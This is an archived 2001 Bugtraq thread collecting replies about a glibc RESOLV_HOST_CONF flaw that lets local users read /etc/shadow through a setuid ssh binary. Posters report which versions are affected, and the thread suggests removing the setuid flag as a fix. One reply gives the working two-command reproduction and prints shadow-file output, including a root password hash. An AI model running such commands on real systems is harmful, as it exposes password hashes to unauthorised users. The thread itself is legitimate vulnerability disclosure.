[18539] in bugtraq


Re: Glibc Local Root Exploit

daemon@ATHENA.MIT.EDU (Ben Greenbaum)
Wed Jan 10 21:00:58 2001

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <Pine.GSO.4.30.0101101741160.531-100000@mail>
Date:         Wed, 10 Jan 2001 17:53:03 -0800
Reply-To: Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
From: Ben Greenbaum <bgreenbaum@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Summary of responses:

----------------------------------
From: Jag <agrajag@linuxpower.org>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1. The key is that
you must actually ssh to a valid host. If ssh can't resolve the host,
it won't display the contents of the file.

------------------------------------------------
From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>

On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
> This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1
> following your example.

Let's test it. :-)

[lukasz@lt lukasz]$ ls -all /usr/bin/ssh
-rwsr-xr-x    1 root     root       176036 Jan  6 14:34 /usr/bin/ssh
[lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow
[lukasz@lt lukasz]$ ssh lt
/etc/shadow: line 1: bad command
`root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268'
/etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::'
/etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::'
/etc/shadow: line 4: bad command `adm:x:10679:0:99999:7:::

Nice. :)

[lukasz@lt lukasz]$ rpm -q openssh
openssh-2.3.0p1-4
[lukasz@lt lukasz]$ rpm -q glibc
glibc-2.2-9
All was taken from RH updates.

[lukasz@lt lukasz]$ cat /etc/redhat-release
Red Hat Linux release 7.0 (Guinness)

but:

[lukasz@yyy lukasz]$ ll /usr/bin/ssh
-rwxr-xr-x    1 root     root       176932 Nov 21 23:53 /usr/bin/ssh
[lukasz@xxx lukasz]$ ssh xxx
lukasz@xxx's password:

glibc 2.2-9 openssh-2.3.0, RH 7.0.

Solution:
Only passwd needs setuid flag. :)

-------------------------------------------------------------------------
From: Alexander Schreiber <alexander.schreiber@informatik.tu-chemnitz.de>

Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does
not work.

----------------------------------------------
From: Michael Devogelaere <michael@digibel.be>

It works on my system:
glibc 2.2 and openssh-2.3.0p1 (all latest updates from Red Hat)
(luckily enough I don't tolerate users on my system <grin>)

-----------------------------------------
From: elliptic <elliptic@cipherpunks.com>

Likewise, I cannot reproduce this bug on Slackware Linux 7.0, which is
currently using glibc version 2.1.3.  Additionally, this is the revision
of glibc included with Slackware 7.1, which would likely also not be
vulnerable.

------------------------------------------------------
From: Joseph Nicholas Yarbrough <nyarbrough@lurhq.com>

I am unable to reproduce this using Slackware 7.1 (glibc 2.1.3).
What version of slackware were these "others" reporting positive results from?

------------------------------------------------
From: Lukasz Trabinski <lukasz@lt.wsisiz.edu.pl>

> [lukasz@lt lukasz]$ rpm -q openssh
> openssh-2.3.0p1-4

I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read
/etc/shadow, too). :-)

------------------------------------------------
